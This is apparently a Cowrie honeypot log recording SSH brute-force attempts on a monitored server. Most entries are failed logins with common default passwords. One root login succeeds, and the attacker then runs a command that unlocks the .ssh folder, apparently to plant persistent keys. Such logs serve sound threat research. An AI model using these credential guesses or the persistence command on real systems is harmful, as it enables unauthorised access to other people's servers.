sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:55.622870Z","src_ip":"212.227.235.229","session":"554ba24ca8d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47952,"dst_ip":"1.2.3.4","dst_port":22,"session":"2509925b361b","protocol":"ssh","message":"New connection: 212.227.235.229:47952 (1.2.3.4:22) [session: 2509925b361b]","sensor":"my-vps","timestamp":"2025-09-09T01:42:56.656211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:56.656860Z","src_ip":"212.227.235.229","session":"2509925b361b"}
{"eventid":"cowrie.login.failed","username":"test","password":"111111","message":"login attempt [test/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:42:56.698486Z","src_ip":"212.227.235.229","session":"554ba24ca8d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:56.890921Z","src_ip":"212.227.235.229","session":"2509925b361b"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch@123","message":"login attempt [elasticsearch/elasticsearch@123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:42:57.866788Z","src_ip":"212.227.235.229","session":"2509925b361b"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:57.958461Z","src_ip":"212.227.235.229","session":"554ba24ca8d1"}
{"eventid":"cowrie.session.connect","src_ip":"8.219.215.112","src_port":51428,"dst_ip":"1.2.3.4","dst_port":23,"session":"cfb5b05657a9","protocol":"telnet","message":"New connection: 8.219.215.112:51428 (1.2.3.4:23) [session: cfb5b05657a9]","sensor":"my-vps","timestamp":"2025-09-09T01:42:58.456738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:42:58.927498Z","src_ip":"212.227.235.229","session":"1d257bb7cccf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:42:58.928173Z","src_ip":"212.227.235.229","session":"1d257bb7cccf"}
{"eventid":"cowrie.session.closed","duration":"14.8","message":"Connection lost after 14.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:58.929933Z","src_ip":"212.227.235.229","session":"1d257bb7cccf"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:42:59.102221Z","src_ip":"212.227.235.229","session":"2509925b361b"}
{"eventid":"cowrie.session.closed","duration":13.133019924163818,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:43:03.771618Z","src_ip":"212.227.125.160","session":"8a7b98512c44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46144,"dst_ip":"1.2.3.4","dst_port":22,"session":"da8a484fa10b","protocol":"ssh","message":"New connection: 212.227.235.229:46144 (1.2.3.4:22) [session: da8a484fa10b]","sensor":"my-vps","timestamp":"2025-09-09T01:43:15.178096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:43:15.179254Z","src_ip":"212.227.235.229","session":"da8a484fa10b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:43:15.491562Z","src_ip":"212.227.235.229","session":"da8a484fa10b"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"!","message":"login attempt [administrator/!] failed","sensor":"my-vps","timestamp":"2025-09-09T01:43:16.781084Z","src_ip":"212.227.235.229","session":"da8a484fa10b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:43:18.095968Z","src_ip":"212.227.235.229","session":"da8a484fa10b"}
{"eventid":"cowrie.session.closed","duration":30.642579793930054,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:43:29.099243Z","src_ip":"8.219.215.112","session":"cfb5b05657a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58490,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d31b1b86d5c","protocol":"ssh","message":"New connection: 212.227.235.229:58490 (1.2.3.4:22) [session: 9d31b1b86d5c]","sensor":"my-vps","timestamp":"2025-09-09T01:43:47.127781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:43:47.128633Z","src_ip":"212.227.235.229","session":"9d31b1b86d5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:43:47.244467Z","src_ip":"212.227.235.229","session":"9d31b1b86d5c"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"password123","message":"login attempt [odoo/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:43:47.751538Z","src_ip":"212.227.235.229","session":"9d31b1b86d5c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:43:48.871070Z","src_ip":"212.227.235.229","session":"9d31b1b86d5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34886,"dst_ip":"1.2.3.4","dst_port":22,"session":"85d5ae372ed0","protocol":"ssh","message":"New connection: 212.227.235.229:34886 (1.2.3.4:22) [session: 85d5ae372ed0]","sensor":"my-vps","timestamp":"2025-09-09T01:43:58.332224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:43:58.333132Z","src_ip":"212.227.235.229","session":"85d5ae372ed0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42402,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d6102e907ed","protocol":"ssh","message":"New connection: 212.227.235.229:42402 (1.2.3.4:22) [session: 5d6102e907ed]","sensor":"my-vps","timestamp":"2025-09-09T01:43:58.521126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:43:58.521891Z","src_ip":"212.227.235.229","session":"5d6102e907ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:43:58.599179Z","src_ip":"212.227.235.229","session":"85d5ae372ed0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:43:58.753638Z","src_ip":"212.227.235.229","session":"5d6102e907ed"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"111111","message":"login attempt [nginx/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:43:59.704618Z","src_ip":"212.227.235.229","session":"85d5ae372ed0"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"12345678","message":"login attempt [ahmad/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:43:59.725401Z","src_ip":"212.227.235.229","session":"5d6102e907ed"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:00.959035Z","src_ip":"212.227.235.229","session":"5d6102e907ed"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:00.972593Z","src_ip":"212.227.235.229","session":"85d5ae372ed0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55294,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8569d2133b9","protocol":"ssh","message":"New connection: 212.227.235.229:55294 (1.2.3.4:22) [session: a8569d2133b9]","sensor":"my-vps","timestamp":"2025-09-09T01:44:04.518793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:04.519780Z","src_ip":"212.227.235.229","session":"a8569d2133b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48518,"dst_ip":"1.2.3.4","dst_port":22,"session":"c28cfc045caa","protocol":"ssh","message":"New connection: 212.227.235.229:48518 (1.2.3.4:22) [session: c28cfc045caa]","sensor":"my-vps","timestamp":"2025-09-09T01:44:04.608029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:04.609185Z","src_ip":"212.227.235.229","session":"c28cfc045caa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:04.746569Z","src_ip":"212.227.235.229","session":"a8569d2133b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:04.850219Z","src_ip":"212.227.235.229","session":"c28cfc045caa"}
{"eventid":"cowrie.login.failed","username":"tester","password":"12345678","message":"login attempt [tester/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:44:05.694721Z","src_ip":"212.227.235.229","session":"a8569d2133b9"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"12345678","message":"login attempt [anonymous/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T01:44:05.854600Z","src_ip":"212.227.235.229","session":"c28cfc045caa"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:06.927963Z","src_ip":"212.227.235.229","session":"a8569d2133b9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:07.097855Z","src_ip":"212.227.235.229","session":"c28cfc045caa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57444,"dst_ip":"1.2.3.4","dst_port":22,"session":"13a66a7abf33","protocol":"ssh","message":"New connection: 212.227.235.229:57444 (1.2.3.4:22) [session: 13a66a7abf33]","sensor":"my-vps","timestamp":"2025-09-09T01:44:10.493267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:10.494154Z","src_ip":"212.227.235.229","session":"13a66a7abf33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:10.757452Z","src_ip":"212.227.235.229","session":"13a66a7abf33"}
{"eventid":"cowrie.login.failed","username":"tom","password":"1234567","message":"login attempt [tom/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T01:44:11.844463Z","src_ip":"212.227.235.229","session":"13a66a7abf33"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:44:13.108404Z","src_ip":"212.227.235.229","session":"13a66a7abf33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49816,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aa857ecee43","protocol":"ssh","message":"New connection: 212.227.235.229:49816 (1.2.3.4:22) [session: 4aa857ecee43]","sensor":"my-vps","timestamp":"2025-09-09T01:44:21.969966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:44:21.971632Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:44:22.280514Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.login.success","username":"root","password":"Kong@2022","message":"login attempt [root/Kong@2022] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:44:23.559474Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:44:24.195996Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:44:24.196655Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:44:24.197807Z","src_ip":"212.227.235.229","session":"4aa857ecee43"}
